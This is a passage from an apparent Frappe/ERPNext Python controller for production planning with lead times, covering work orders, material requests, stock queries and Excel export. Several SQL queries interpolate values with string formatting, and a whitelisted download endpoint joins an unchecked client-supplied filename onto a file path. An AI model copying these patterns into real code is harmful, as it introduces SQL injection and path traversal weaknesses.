(item.get('date_to_be_ready')-item.get('latest_date_availability'))\n\t\t\t\t\t\t# \tif readiness_status.days > 0:\n\t\t\t\t\t\t# \t\titem.update({'readiness_status':'#008000'})\n\t\t\t\t\t\t# \telif readiness_status.days < 0:\n\t\t\t\t\t\t# \t\titem.update({'readiness_status':'#FFA500'})\n\t\t\t\t\t\t# \telse:\n\t\t\t\t\t\t# \t\titem.update({'readiness_status':'#FF8000'})\n\t\t\t\t\t\t# else:\n\t\t\t\t\t\t# \titem.update({'readiness_status':'#FF0000'})\n\t\t\t\t\t\t# if item.get('qty') == 0:\n\t\t\t\t\t\t# \titem.update({'readiness_status':'#008000'})\n\t\t\t\t\t\t# \titem.update({'latest_date_availability':today_date})\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tself.append('raw_materials_table',item)\n\t\t\treturn self.raw_materials_table\n\t@frappe.whitelist()\n\tdef prepare_final_work_orders(self):\n\t\tif self.fg_items_table:\n\t\t\titem_list = []\n\t\t\tfor row in self.fg_items_table:\n\t\t\t\tfg_item_dict = dict()\n\t\t\t\tif row.planned_qty > 0:\n\t\t\t\t\tfor item in self.sub_assembly_items_table:\n\t\t\t\t\t\titem_dict = dict()\n\t\t\t\t\t\tif item.sales_order == row.sales_order and item.qty >0 and item.fg_row_name == row.name:\n\t\t\t\t\t\t\titem_dict.update({\n\t\t\t\t\t\t\t\t'item':item.item,\n\t\t\t\t\t\t\t\t'qty':item.qty,\n\t\t\t\t\t\t\t\t'sales_order':item.sales_order,\n\t\t\t\t\t\t\t\t'material_request':item.material_request,\n\t\t\t\t\t\t\t\t'bom':item.bom,\n\t\t\t\t\t\t\t\t'total_operation_time':item.total_operation_time,\n\t\t\t\t\t\t\t\t'date_to_be_ready':item.planned_start_date,\n\t\t\t\t\t\t\t\t'is_subassembly' : 1,\n\t\t\t\t\t\t\t\t'parent_item_code':row.item\n\t\t\t\t\t\t\t\t})\n\t\t\t\t\t\t\titem_list.append(item_dict)\n\t\t\t\t\tfg_item_dict.update({\n\t\t\t\t\t\t'item':row.item,\n\t\t\t\t\t\t'qty':row.planned_qty,\n\t\t\t\t\t\t'sales_order':row.sales_order,\n\t\t\t\t\t\t'sales_order_item':row.sales_order_item,\n\t\t\t\t\t\t'material_request':row.material_request,\n\t\t\t\t\t\t'material_request_item':row.material_request_item,\n\t\t\t\t\t\t'bom':row.bom,\n\t\t\t\t\t\t'total_operation_time':row.total_operation_time,\n\t\t\t\t\t\t'date_to_be_ready':row.planned_start_date,\n\t\t\t\t\t\t'is_subassembly':0,\n\t\t\t\t\t\t'parent_item_code':row.item\n\t\t\t\t\t\t})\t\t\t\t\t\n\t\t\t\t\titem_list.append(fg_item_dict)\n\t\t\tcount = 1\n\t\t\tfor row in item_list:\n\t\t\t\trow.update({'idx':count})\n\t\t\t\tself.append(\"final_work_orders\",row)\n\t\t\t\tcount = count + 1\n\t\t\treturn self.final_work_orders\n\t@frappe.whitelist()\n\tdef create_work_order(self):\n\t\tif self.final_work_orders:\n\t\t\tfrom erpnext.manufacturing.doctype.work_order.work_order import get_default_warehouse\n\t\t\two_list= []\n\t\t\tdefault_warehouses = get_default_warehouse()\n\t\t\tself.make_work_order_for_finished_goods(wo_list, default_warehouses)\n\t\t\tself.show_list_created_message(\"Work Order\", wo_list)\n\t\t\tfrappe.db.set_value(\"Production Planning With Lead Time\",self.name,'status','In Progress')\n\t\t\tfrappe.db.commit()\n\t\telse:\n\t\t\tfrappe.msgprint(\"Please Prepare for Final Work Orders\")\n\tdef make_work_order_for_finished_goods(self, wo_list, default_warehouses):\n\t\titems_data = self.get_production_items()\n\t\tfor key, item in items_data.items():\n\t\t\tset_default_warehouses(item, default_warehouses)\n\t\t\two= frappe.db.get_value(\"Work Order\",{'production_item':item.get('production_item'),'so_reference':item.get('so_reference')}) or frappe.db.get_value(\"Work Order\",{'production_item':item.get('production_item'),'mr_reference':item.get('mr_reference')})\n\t\t\tif not wo: \n\t\t\t\twork_order = self.create_work_orders(item)\n\t\t\t\tif work_order:\n\t\t\t\t\two_list.append(work_order)\n\t\t\t\t\t#Add WO Status on Final Work Order Table \n\t\t\t\t\two_status = frappe.db.get_value(\"Work Order\", work_order, \"status\")\n\t\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'sales_order':item.get('so_reference')}, \"wo_status\", wo_status)\n\t\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'sales_order':item.get('so_reference')}, \"work_order\", work_order)\n\n\t\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'material_request':item.get('mr_reference')}, \"wo_status\", wo_status)\n\t\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'material_request':item.get('mr_reference')}, \"work_order\", work_order)\n\n\t\t\t\t\t\n\t\t\t\t\tfrappe.db.commit()\n\t\t\telse:\n\t\t\t\two_status = frappe.db.get_value(\"Work Order\", wo, \"status\")\n\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'sales_order':item.get('so_reference')}, \"wo_status\", wo_status)\n\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'sales_order':item.get('so_reference')}, \"work_order\", wo)\n\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'material_request':item.get('mr_reference')}, \"wo_status\", wo_status)\n\t\t\t\tfrappe.db.set_value(\"Final Work Orders\", {'item':item.get('production_item'), 'material_request':item.get('mr_reference')}, \"work_order\", wo)\n\t\t\t\tfrappe.db.commit()\n\t\t\t\two = get_link_to_form(\"Work Order\", wo)\n\t\t\t\tso = get_link_to_form(\"Sales Order\",item.get('so_reference'))\n\t\t\t\tmsgprint(_(\"Work Order {0} is already created for the item {1} and Sales Order {2} \").format(wo,item.get(\"production_item\"),so))\n\t\t\t\t# frappe.msgprint(\"Work Order {0} is already created for this item {1}\".format(wo,item.get(\"production_item\")))\n\tdef get_production_items(self):\n\t\titem_dict = {}\n\t\tdefault_company = frappe.db.get_single_value(\"Global Defaults\", \"default_company\")\n\t\tfor d in self.final_work_orders:\n\t\t\titem_data = get_item_defaults(d.item, default_company)\n\t\t\titem_details = {\n\t\t\t\t\"production_item\": d.item,\n\t\t\t\t\"use_multi_level_bom\": 0,\n\t\t\t\t\"sales_order\": d.sales_order if d.is_subassembly == 0 else None,\n\t\t\t\t\"so_reference\":d.sales_order,\n\t\t\t\t\"sales_order_item\": d.sales_order_item,\n\t\t\t\t\"bom_no\": d.bom,\n\t\t\t\t\"description\": item_data.get('description'),\n\t\t\t\t\"stock_uom\": item_data.get('stock_uom'),\n\t\t\t\t\"company\": default_company,\n\t\t\t\t\"planned_start_date\": d.date_to_be_ready,\n\t\t\t\t\"qty\":d.qty,\n\t\t\t\t\"production_planning_with_lead_time\":self.name,\n\t\t\t\t\"material_request\":d.material_request if d.is_subassembly == 0 else None,\n\t\t\t\t\"material_request_item\":d.material_request_item,\n\t\t\t\t\"mr_reference\":d.material_request,\n\t\t\t\t\"parent_item_code\":d.parent_item_code\n\t\t\t}\n\t\t\tif d.sales_order:\n\t\t\t\titem_dict[(d.item, d.sales_order)] = item_details\n\t\t\telse:\n\t\t\t\titem_dict[(d.item, d.material_request)] = item_details\n\n\t\treturn item_dict\n\n\tdef create_work_orders(self, item):\n\t\tfrom erpnext.manufacturing.doctype.work_order.work_order import OverProductionError\n\t\two = frappe.new_doc(\"Work Order\")\n\t\two.update(item)\n\t\two.planned_start_date = item.get(\"planned_start_date\") or item.get(\"schedule_date\")\n\t\t# check item group to set default target warehouse\n\t\titem_group = frappe.db.get_value(\"Item\",{'item_code':item.get('production_item')},'item_group')\n\n\t\tif item.get(\"warehouse\"):\n\t\t\two.fg_warehouse = item.get(\"warehouse\")\n\t\t# if item belong to subassembly assign target warehouse as wip warehosue\n\t\tif item_group != 'Product':\n\t\t\two.fg_warehouse = item.get('wip_warehouse')\n\n\t\two.set_work_order_operations()\n\t\two.set_required_items()\n\n\t\ttry:\n\t\t\two.flags.ignore_mandatory = True\n\t\t\two.flags.ignore_validate = True\n\t\t\two.insert()\n\t\t\treturn wo.name\n\t\texcept OverProductionError:\n\t\t\tpass\n\tdef show_list_created_message(self, doctype, doc_list=None):\n\t\tif not doc_list:\n\t\t\treturn\n\n\t\tfrappe.flags.mute_messages = False\n\t\tif doc_list:\n\t\t\tdoc_list = [get_link_to_form(doctype, p) for p in doc_list]\n\t\t\tmsgprint(_(\"{0} created\").format(comma_and(doc_list)))\n\n\tdef get_planned_data_fg(self):\n\t\tplanned_data = frappe.db.sql(\"\"\"SELECT i.item,sum(i.planned_qty) as qty from `tabFG Items Table` i join `tabProduction Planning With Lead Time` pp on pp.name = i.parent where pp.docstatus not in (0,2) and pp.status not in ('Completed') and i.material_request != '' group by i.item\"\"\",as_dict=1,debug=1)\n\t\tplanned_data = {i.item : i.qty for i in planned_data}\n\t\treturn planned_data\n\t\t# Get planned qty from material request for which production plan not in place and work order not in place\n\t\t# planned_mr = frappe.db.sql(\"\"\"SELECT mri.item_code,sum(mri.qty) as qty from `tabMaterial Request` mr join `tabMaterial Request Item` mri on mri.parent = mr.name where mr.transaction_date < '{0}' and mr.transaction_date >= '{1}' and not exists(SELECT pp.name from `tabProduction Plan` pp join `tabProduction Plan Material Request` pp_item on pp_item.parent = pp.name where pp_item.material_request = mr.name) and not exists(SELECT wo.name from `tabWork Order` wo where wo.material_request = mr.name)\"\"\".format(self.to_date,self.from_date),as_dict=1)\n\t\t# # Manipulate in order to show in dict format\n\t\t# planned_data_dict = {item.item_code : item.qty for item in planned_mr if item.item_code != None and item.qty != None}\n\t\t# Get planned qty from production plan for which work order not in place\n\t\t# planned_data_dict = dict()\n\t\t# if self.to_date and self.from_date:\n\t\t# \tplanned_pp = frappe.db.sql(\"\"\"SELECT pp_item.item_code,sum(pp_item.planned_qty) as planned_qty from `tabProduction Plan` pp join `tabProduction Plan Item` pp_item on pp_item.parent = pp.name where pp.posting_date < {0} and pp.posting_date >= '{1}' and pp.docstatus = 1 and not exists(SELECT wo.name from `tabWork Order` wo where wo.production_plan = pp.name)\"\"\".format(self.to_date,self.from_date),as_dict=1)\n\t\t# else:\n\t\t# \tplanned_pp = frappe.db.sql(\"\"\"SELECT pp_item.item_code,sum(pp_item.planned_qty) as planned_qty from `tabProduction Plan` pp join `tabProduction Plan Item` pp_item on pp_item.parent = pp.name and pp.docstatus =1 and not exists(SELECT wo.name from `tabWork Order` wo where wo.production_plan = pp.name)\"\"\",as_dict=1)\n\t\t# # update planned_data_dict\n\t\t# if planned_pp:\n\t\t# \tfor row in planned_pp:\n\t\t# \t\tif row.get('item_code') in planned_data_dict:\n\t\t# \t\t\tqty = flt(planned_data_dict.get(row.get('item_code'))) + row.get('planned_qty')\n\t\t# \t\t\tplanned_data_dict.update({row.get('item_code'):qty})\n\t\t# \t\telse:\n\t\t# \t\t\tif row.item_code != None and row.planned_qty != None:\n\t\t# \t\t\t\tplanned_data_dict.update({row.get('item_code'):row.get('planned_qty')})\n\t\t# # Get planned qty from work order\n\t\t# if self.to_date and self.from_date:\n\t\t# \tplanned_wo = frappe.db.sql(\"\"\"SELECT wo.production_item,(wo.qty-wo.produced_qty) as qty from `tabWork Order` wo where wo.planned_start_date < '{0}' and wo.planned_start_date >= '{1}' and wo.docstatus=1\"\"\".format(self.to_date,self.from_date),as_dict=1)\n\t\t# else:\n\t\t# \tplanned_wo = frappe.db.sql(\"\"\"SELECT wo.production_item,(wo.qty-wo.produced_qty) as qty from `tabWork Order` wo where wo.docstatus=1\"\"\",as_dict=1)\n\t\t# # update planned_data_dict\n\t\t# if planned_wo:\n\t\t# \tfor row in planned_wo:\n\t\t# \t\tif row.get('production_item') in planned_data_dict:\n\t\t# \t\t\tqty = flt(planned_data_dict.get(row.get('production_item'))) + row.get('qty')\n\t\t# \t\t\tplanned_data_dict.update({row.get('production_item'):qty})\n\t\t# \t\telse:\n\t\t# \t\t\tif row.item_code != None and row.planned_qty != None:\n\t\t# \t\t\t\tplanned_data_dict.update({row.get('production_item'):row.get('qty')})\n\t\t# \t\t\telse:\n\t\t# \t\t\t\tplanned_data_dict = {}\n\t\t# return planned_data_dict\n\t\n\t@frappe.whitelist()\n\tdef make_material_request(self):\n\t\t\"\"\"Create Material Requests grouped by Sales Order and Material Request Type\"\"\"\n\t\tmaterial_request_list = []\n\t\tmaterial_request_map = {}\n\t\tdefault_company = frappe.db.get_single_value(\"Global Defaults\", \"default_company\")\n\t\tmr_doc = frappe.db.get_value(\"Material Request\",{'production_planning_with_lead_time':self.name},'name')\n\n\t\tif not mr_doc:\n\t\t\tmaterial_request_doc = frappe.new_doc(\"Material Request\")\n\t\t\tif material_request_doc:\n\t\t\t\tmaterial_request_doc.material_request_type = \"Purchase\"\n\t\t\t\tmaterial_request_doc.transaction_date = nowdate()\n\t\t\t\tmaterial_request_doc.company = default_company\n\t\t\t\tmaterial_request_doc.production_planning_with_lead_time = self.name\n\t\t\t\tfor row in self.raw_materials_table:\n\t\t\t\t\tif row.qty > 0:\n\t\t\t\t\t\titem_doc = get_item_defaults(row.item, default_company)\n\t\t\t\t\t\t# Make material requests for only stock items\n\t\t\t\t\t\tstock_item = frappe.db.get_value(\"Item\",{'name':row.item},'is_stock_item')\n\t\t\t\t\t\tif stock_item:\n\t\t\t\t\t\t\tengineering_revision = frappe.db.get_value(\"Engineering Revision\",{'item_code':row.item,'is_default':1,'is_active':1},'name')\n\t\t\t\t\t\t\tmaterial_request_doc.append(\"items\",{\n\t\t\t\t\t\t\t\t'item_code': row.item,\n\t\t\t\t\t\t\t\t'item_name': item_doc.get(\"item_name\"),\n\t\t\t\t\t\t\t\t'engineering_revision':item_doc.get(\"engineering_revision\") if item_doc.get(\"engineering_revision\") else engineering_revision,\n\t\t\t\t\t\t\t\t'rfq_required':item_doc.get('rfq_required'),\n\t\t\t\t\t\t\t\t'schedule_date':row.get('date_to_be_ready'),\n\t\t\t\t\t\t\t\t'description':item_doc.get('description'),\n\t\t\t\t\t\t\t\t'item_group':item_doc.get('item_group'),\n\t\t\t\t\t\t\t\t'qty':row.qty,\n\t\t\t\t\t\t\t\t'uom':item_doc.get(\"stock_uom\"),\n\t\t\t\t\t\t\t\t'stock_uom':item_doc.get(\"stock_uom\"),\n\t\t\t\t\t\t\t\t'warehouse':item_doc.get('item_defaults')[0].get('default_warehouse') if item_doc.get('item_defaults') else ''\n\t\t\t\t\t\t\t\t})\n\t\t\t\tmaterial_request_doc.flags.ignore_permissions = 1\n\t\t\t\tmaterial_request_doc.run_method(\"set_missing_values\")\n\t\t\t\tmaterial_request_doc.save()\n\n\t\t\t\tfrappe.flags.mute_messages = False\n\n\t\t\t\tif material_request_doc:\n\t\t\t\t\tupdate_mr_status_in_raw_materials_table(self, material_request_doc.name)\n\t\t\t\t\tmr = get_link_to_form(\"Material Request\",material_request_doc.name)\n\t\t\t\t\tmsgprint(_(\"Material Request {0} Created.\").format(mr))\n\t\t\t\telse:\n\t\t\t\t\tmsgprint(_(\"No material request created\"))\n\t\telse:\n\t\t\tupdate_mr_status_in_raw_materials_table(self, mr_doc)\n\t\t\tmr = get_link_to_form(\"Material Request\",mr_doc)\n\t\t\tmsgprint(_(\"Material Request {0} is Already Created.\").format(mr))\n\n\t@frappe.whitelist()\n\tdef download_raw_material(self):\n\t\t#Add the headers\n\t\theaders = ['Item', 'Qty', 'Original Qty', 'Date To Be Ready', 'Available Stock', 'Shortage', 'Lead Time', 'On Order Stock', 'Order in Days', 'Latest Date Availability', 'Readiness Status', 'MR Status']\n\t\tfinal_data = []\n\t\t#raw material table is empty then throw the messsage \n\t\tif not self.raw_materials_table:\n\t\t\tfrappe.throw('Raw Material Table Is Empty')\n\t\telse:\n\t\t\tfor i in self.raw_materials_table:\n\t\t\t\t#add the data\n\t\t\t\tdep_data = {}\n\t\t\t\tdep_data['Item'] = i.item\n\t\t\t\tdep_data['Qty'] = i.qty\n\t\t\t\tdep_data['Original Qty'] = i.original_qty\n\t\t\t\tdep_data['Date To Be Ready'] = i.date_to_be_ready\n\t\t\t\tdep_data['Available Stock'] = i.available_stock\n\t\t\t\tdep_data['Shortage'] = i.shortage\n\t\t\t\tdep_data['Lead Time'] = i.lead_time\n\t\t\t\tdep_data['On Order Stock'] = i.on_order_stock\n\t\t\t\tdep_data['Order in Days'] = i.order_in_days\n\t\t\t\tdep_data['Latest Date Availability'] = i.latest_date_availability\n\t\t\t\tdep_data['Readiness Status'] = i.readiness_status\n\t\t\t\tdep_data['MR Status'] = i.mr_status\n\t\t\t\tfinal_data.append(dep_data)\n\t\t\tif final_data:\n\t\t\t\tbook = Workbook()\t \n\t\t\t\tsheet = book.active\t\n\t\t\t\trow = 1\n\t\t\t\tcol = 1\n\t\t\t\tfor item in headers:\n\t\t\t\t\tcell = sheet.cell(row=row,column=col)\t\t\t\t\n\t\t\t\t\tcell.font = Font(bold=True, color=\"FF0000\") \n\t\t\t\t\tcell.value = item\n\t\t\t\t\tcol += 1\n\t\t\t\trow = 2\n\t\t\t\tcol = 1\n\n\t\t\t\tfor item in final_data: \n\t\t\t\t\tcell = sheet.cell(row=row,column=col)\n\t\t\t\t\tcell.value = item['Item']\n\n\t\t\t\t\tcell = sheet.cell(row=row,column=col+1)\n\t\t\t\t\tcell.value = item['Qty']\n\n\t\t\t\t\tcell = sheet.cell(row=row,column=col+2)\n\t\t\t\t\tcell.value = item['Original Qty'] \n\t\t\t\t\t\n\t\t\t\t\tcell = sheet.cell(row=row,column=col+3)\n\t\t\t\t\tcell.value = item['Date To Be Ready']\n\t\t\t\t\t\n\t\t\t\t\tcell = sheet.cell(row=row,column=col+4)\n\t\t\t\t\tcell.value = item['Available Stock']\n\t\t\t\t\t\n\t\t\t\t\tcell = sheet.cell(row=row,column=col+5)\n\t\t\t\t\tcell.value = item['Shortage']\n\t\t\t\t\t\n\t\t\t\t\tcell = sheet.cell(row=row,column=col+6)\n\t\t\t\t\tcell.value = item['Lead Time']\n\t\t\t\t\t\n\t\t\t\t\tcell = sheet.cell(row=row,column=col+7)\n\t\t\t\t\tcell.value = item['On Order Stock']\n\n\t\t\t\t\tcell = sheet.cell(row=row,column=col+8)\n\t\t\t\t\tcell.value = item['Order in Days']\n\n\t\t\t\t\tcell = sheet.cell(row=row,column=col+9)\n\t\t\t\t\tcell.value = item['Latest Date Availability']\n\n\t\t\t\t\tcell = sheet.cell(row=row,column=col+10)\n\t\t\t\t\tcell.value = item['Readiness Status']\n\n\t\t\t\t\tcell = sheet.cell(row=row,column=col+11)\n\t\t\t\t\tcell.value = item['MR Status']\n\t\t\t\t\trow += 1\n\t\t\t\tfile_path = frappe.utils.get_site_path(\"public\")\n\t\t\t\tfname = self.name + '-' + now() + \".xlsx\"\n\t\t\t\t# fname = self.name + \".xlsx\"\n\t\t\t\tbook.save(file_path+fname)\n\t\t\t\treturn fname\n\n\tdef validate(self):\n\t\tqty = []\n\t\tcount = 1\n\t\tif self.hide_zero_qty_item == 1 and self.raw_materials_table:\n\t\t\tfor i in self.raw_materials_table:\n\t\t\t\t#Get qty greater than zero \t\t\t\t\n\t\t\t\tif i.qty != 0:\n\t\t\t\t\ti.idx = count\n\t\t\t\t\tqty.append(deepcopy(i))\n\t\t\t\t\tcount += 1\n\t\t\tif qty:\n\t\t\t\tself.raw_materials_table.clear()\n\t\t\t\tself.raw_materials_table = qty\n\t\t\t\t# self.reload()\n\t\n@frappe.whitelist()\ndef download_xlsx(fname):\n\tfile_path = frappe.utils.get_site_path(\"public\")\n\t# fname = fname + '-' + now() + \".xlsx\"\n\twb = openpyxl.load_workbook(filename=file_path+fname)\n\txlsx_file = BytesIO()\n\twb.save(xlsx_file)\n\tfrappe.local.response.filecontent=xlsx_file.getvalue()\n\n\tfrappe.local.response.type = \"download\"\n\t\n\tfrappe.local.response.filename = fname\n\t\ndef set_default_warehouses(row, default_warehouses):\n\tfor field in [\"wip_warehouse\", \"fg_warehouse\"]:\n\t\tif not row.get(field):\n\t\t\trow[field] = default_warehouses.get(field)\n\ndef make_work_order_for_finished_goods(production_plan_doc, wo_list):\n\titems_data = get_production_items(production_plan_doc)\n\tfor key, item in items_data.items():\n\t\tif production_plan_doc.sub_assembly_items:\n\t\t\titem['use_multi_level_bom'] = 0\n\n\t\twork_order =create_work_order(production_plan_doc,item)\n\t\tif work_order:\n\t\t\two_list.append(work_order)\n@frappe.whitelist()\ndef get_raw_items(bom,raw_data,qty):\n\tdoc = frappe.get_doc(\"BOM\",{'name':bom})\n\tif doc:\n\t\tfor row in doc.items:\n\t\t\tstock_qty = (row.qty*qty)\n\t\t\tif not row.bom_no:\n\t\t\t\traw_data.append({\n\t\t\t\t\t'item':row.item_code,\n\t\t\t\t\t'qty':stock_qty\n\t\t\t\t})\n\t\treturn raw_data\n@frappe.whitelist()\ndef get_sub_assembly_item(bom_no, bom_data, to_produce_qty,date_to_be_ready,row_name, warehouse_list, indent=0):\n\tdata = get_children('BOM', parent = bom_no)\n\tfor d in data:\n\t\tif d.expandable:\n\t\t\toperation_time = frappe.db.sql(\"\"\"SELECT sum(time_in_mins) as operation_time from `tabBOM Operation` where parent = '{0}'\"\"\".format(d.value),as_dict=1)\n\t\t\tmakeup_days = frappe.db.get_value(\"BOM\",{'name':d.value},'makeup_days')\n\t\t\tparent_item_code = frappe.get_cached_value(\"BOM\", bom_no, \"item\")\n\t\t\tstock_qty = (d.stock_qty / d.parent_bom_qty) * flt(to_produce_qty)\n\t\t\ttotal_operation_time_in_mins = flt(operation_time[0].get('operation_time'))*stock_qty\n\t\t\ttotal_operation_time_in_days = ceil(total_operation_time_in_mins/480)\n\t\t\t# Calculate date_to_be_ready\n\t\t\tdate_to_be_ready = (date_to_be_ready-timedelta(total_operation_time_in_days)-timedelta(makeup_days))\n\t\t\tdate_dict = check_workstation_availability(date_to_be_ready,d.value,stock_qty)\n\n\t\t\t#calculate partial stock and workstation availability\n\t\t\tpartial_qty_dict=get_partial_qty(date_to_be_ready, d.item_code, warehouse_list)\n\t\t\tpartial_workstation_availability=check_partial_workstation_availability(date_to_be_ready,d.value, stock_qty)\n\t\t\tpartial_remark = \"{0}{1}\".format(partial_qty_dict.get(\"partial_remark\"), partial_workstation_availability.get(\"remark\") if partial_workstation_availability else \"\")\n\n\t\t\tbom_data.append(frappe._dict({\n\t\t\t\t'parent_item_code': parent_item_code,\n\t\t\t\t'description': d.description,\n\t\t\t\t'production_item': d.item_code,\n\t\t\t\t'item_name': d.item_name,\n\t\t\t\t'stock_uom': d.stock_uom,\n\t\t\t\t'uom': d.stock_uom,\n\t\t\t\t'bom_no': d.value,\n\t\t\t\t'is_sub_contracted_item': d.is_sub_contracted_item,\n\t\t\t\t'bom_level': indent,\n\t\t\t\t'indent': indent,\n\t\t\t\t'stock_qty': stock_qty,\n\t\t\t\t'date_to_be_ready':date_to_be_ready,\n\t\t\t\t'planned_start_date' : date_dict.get(\"planned_start_date\") if date_dict else date_to_be_ready,\n\t\t\t\t'total_operation_time':total_operation_time_in_days,\n\t\t\t\t'row_name':row_name,\n\t\t\t\t'remark':date_dict.get(\"remark\") if date_dict else \"\",\n\t\t\t\t\"partial_remark\": partial_remark\n\t\t\t}))\n\t\t\tif d.value:\n\n\t\t\t\tif date_dict:\n\t\t\t\t\tget_sub_assembly_item(d.value, bom_data, stock_qty,date_dict.get('planned_start_date'), row_name, warehouse_list, indent=indent+1)\n\t\t\t\telse:\n\t\t\t\t\tget_sub_assembly_item(d.value, bom_data, stock_qty,date_to_be_ready,row_name, warehouse_list, indent=indent+1)\ndef get_on_order_stock(self,required_date):\n\tplanned_po = frappe.db.sql(\"\"\"SELECT poi.item_code,sum(poi.qty-poi.received_qty) as qty,poi.schedule_date from `tabPurchase Order` po join `tabPurchase Order Item` poi on poi.parent = po.name where poi.schedule_date < '{0}' and qty > 0 group by poi.item_code\"\"\".format(required_date),as_dict=1,debug=0)\n\t# Manipulate in order to show in dict format\n\tif planned_po:\n\t\ton_order_stock = {item.item_code : item.qty for item in planned_po if item.item_code!=None}\n\telse:\n\t\ton_order_stock = dict()\n\tschedule_date_dict = {item.item_code : item.schedule_date for item in planned_po if item.item_code!=None}\n\tplanned_mr = frappe.db.sql(\"\"\"SELECT mri.item_code,sum(mri.qty) as qty ,mri.schedule_date from `tabMaterial Request` mr join `tabMaterial Request Item` mri on mri.parent = mr.name where mr.schedule_date <= '{0}' and mr.material_request_type = 'Purchase' and not exists (SELECT po.name from `tabPurchase Order` po join `tabPurchase Order Item` poi on poi.parent = po.name where poi.material_request = mr.name) and mr.docstatus = 1 and qty >0 group by mri.item_code\"\"\".format(required_date),as_dict=1)\n\tif planned_mr:\n\t\tfor row in planned_mr:\n\t\t\tif row.get('item_code') != None:\n\t\t\t\tif row.get('item_code') in on_order_stock:\n\t\t\t\t\tqty = flt(on_order_stock.get(row.get('item_code'))) + flt(row.get('qty'))\n\t\t\t\t\ton_order_stock.update({row.get('item_code'):qty})\n\t\t\t\telse:\n\t\t\t\t\ton_order_stock.update({row.get('item_code'):flt(row.get('qty'))})\n\t\t\t\tif row.get('item_code') in schedule_date_dict:\n\t\t\t\t\tif row.get('schedule_date') > schedule_date_dict.get(row.get('item_code')):\n\t\t\t\t\t\tschedule_date_dict.update({row.get('item_code'):row.schedule_date})\n\t\t\t\telse:\n\t\t\t\t\tschedule_date_dict.update({row.get('item_code'):row.schedule_date})\n\treturn on_order_stock,schedule_date_dict\n# fetch warehouse from Rushabh settings\ndef get_warehouses():\n\t# warehouse list\n\tfg_warehouse = frappe.db.sql(\"SELECT warehouse from `tabWarehouse Table`\", as_dict = 1)\n\tall_warehouses = frappe.db.sql(\"SELECT warehouse from `tabBin`\",as_dict=1)\n\tfrom_warehouses = []\n\n\tif fg_warehouse:\n\t\tfor row in fg_warehouse:\n\t\t\twarehouse_list = frappe.db.get_descendants('Warehouse', row.warehouse)\n\t\t\tif warehouse_list:\n\t\t\t\tfor item in warehouse_list:\n\t\t\t\t\tfrom_warehouses.append(item)\n\t\t\telse:\n\t\t\t\tfrom_warehouses.append(row.warehouse)\n\t\tfg_warehouse_ll = [\"'\" + row + \"'\" for row in from_warehouses]\n\t\tfg_warehouse_list = ','.join(fg_warehouse_ll)\n\telse:\n\t\tfor row in all_warehouses:\n\t\t\tfrom_warehouses.append(row.get('warehouse'))\n\t\tfg_warehouse_ll = [\"'\" + row + \"'\" for row in from_warehouses]\n\t\tfg_warehouse_list = ','.join(fg_warehouse_ll)\n\t # fg_warehouse_list = \"' '\"\n\t\n\treturn fg_warehouse_list\n\ndef get_ohs(fg_warehouse_list):\n\tcurrent_stock = frappe.db.sql(\"\"\"SELECT item_code,sum(actual_qty) as qty from `tabBin` where warehouse in ({0}) group by item_code \"\"\".format(fg_warehouse_list),as_dict=1)\n\tohs_dict = {item.item_code : item.qty for item in current_stock}\n\treturn ohs_dict\n\ndef get_allocated_ohs_fg():\n\tallocated_ohs = frappe.db.sql(\"\"\"SELECT i.item,sum(i.available_stock) as qty from `tabFG Items Table` i join `tabProduction Planning With Lead Time` pp on pp.name = i.parent where pp.docstatus not in (0,2) and pp.status not in ('Completed') group by i.item\"\"\",as_dict=1,debug=1)\n\tallocated_ohs = {item.item : item.qty for item in allocated_ohs}\n\treturn allocated_ohs\n\ndef get_allocated_planned_stock_fg():\n\tallocated_ohs = frappe.db.sql(\"\"\"SELECT i.item,sum(i.already_planned_qty) as qty from `tabFG Items Table` i join `tabProduction Planning With Lead Time` pp on pp.name = i.parent where pp.docstatus not in (0,2) and pp.status not in ('Completed') group by i.item\"\"\",as_dict=1,debug=1)\n\tallocated_ohs = {item.item : item.qty for item in allocated_ohs}\n\n\treturn allocated_ohs\n\n\ndef get_allocated_ohs_sfg():\n\tallocated_ohs = frappe.db.sql(\"\"\"SELECT i.item,sum(i.available_stock) as qty from `tabSub Assembly Items Table` i join `tabProduction Planning With Lead Time` pp on pp.name = i.parent where pp.docstatus not in (0,2) and pp.status not in ('Completed') group by i.item\"\"\",as_dict=1,debug=1)\n\tallocated_ohs = {item.item : item.qty for item in allocated_ohs}\n\treturn allocated_ohs\n\ndef get_allocated_planned_stock_sfg():\n\tallocated_ohs = frappe.db.sql(\"\"\"SELECT i.item,sum(i.already_planned_qty) as qty from `tabSub Assembly Items Table` i join `tabProduction Planning With Lead Time` pp on pp.name = i.parent where pp.docstatus not in (0,2) and pp.status not in ('Completed') group by i.item\"\"\",as_dict=1,debug=1)\n\tallocated_ohs = {item.item : item.qty for item in allocated_ohs}\n\n\treturn allocated_ohs\n\ndef get_allocated_ohs_raw():\n\tallocated_ohs = frappe.db.sql(\"\"\"SELECT i.item,sum(i.available_stock) as qty from `tabRaw Materials Table` i join `tabProduction Planning With Lead Time` pp on pp.name = i.parent where pp.docstatus not in (0,2) and pp.status not in ('Completed') group by i.item\"\"\",as_dict=1,debug=1)\n\tallocated_ohs = {item.item : item.qty for item in allocated_ohs}\n\n\treturn allocated_ohs\n\ndef get_actual_ohs(ohs,allocated_ohs):\n\tif ohs and allocated_ohs:\n\t\tfor row in allocated_ohs:\n\t\t\tif row in ohs:\n\t\t\t\tqty = flt(ohs.get(row)) - flt(allocated_ohs.get(row))\n\t\t\t\tohs.update({row:qty if qty > 0 else 0})\n\treturn ohs\n\ndef get_actual_planned_fg(planned_data,allocated_planned_stock):\n\tif planned_data and allocated_planned_stock:\n\t\tfor row in planned_data:\n\t\t\tif row in planned_data:\n\t\t\t\tqty = planned_data.get(row) - allocated_planned_stock.get(row)\n\t\t\t\tplanned_data.update({row:qty})\n\treturn planned_data\n\ndef get_sales_orders(self):\n\tso_filter = item_filter = 